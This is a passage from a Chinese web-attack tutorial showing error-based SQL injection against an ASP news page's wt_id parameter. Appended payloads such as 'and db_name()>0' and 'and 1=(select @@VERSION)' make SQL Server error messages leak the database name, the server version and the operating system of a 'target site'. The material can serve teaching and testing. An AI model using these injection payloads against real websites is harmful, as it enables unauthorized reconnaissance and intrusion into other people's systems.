第六步：接下来我们来测试当前AAA帐户连接的数据库名称是什么，输入http://xxx/news_show.asp?wt_id=25 and db_name()>0，错误提示为——Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将nvarchar值 'BBB' 转换为数据类型为int的列时发生语法错误。 这说明当前AAA帐户连接的数据库名称为BBB。(如图6)

　　图6

　　第七步：我们继续来判断目标网站数据库类型和版本，通过输入http://xxx/news_show.asp?wt_id=25 and 1=(select @@VERSION)，显示错误提示为——Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换为数据类型为 int 的列时发生语法错误。从这个错误信息我们可以知道目标站点的数据库为Microsoft SQL Server 2000 8.00.2039版，服务器操作系统为Windows NT 5.2 (Build 3790: Service Pack 2)，说明该系统为windows 2003 sp2。(如图7)

　　图7

　　至此我们就完成了对目标站点的信息收集工作，该服务器使用的是windows 2003操作系统并且安装了最新的SP2补丁，数据库使用的是Microsoft SQL Server 2000 8.00.2039版，该网站使用的数据库名称为BBB，而连接BBB数据库的帐户信息为AAA。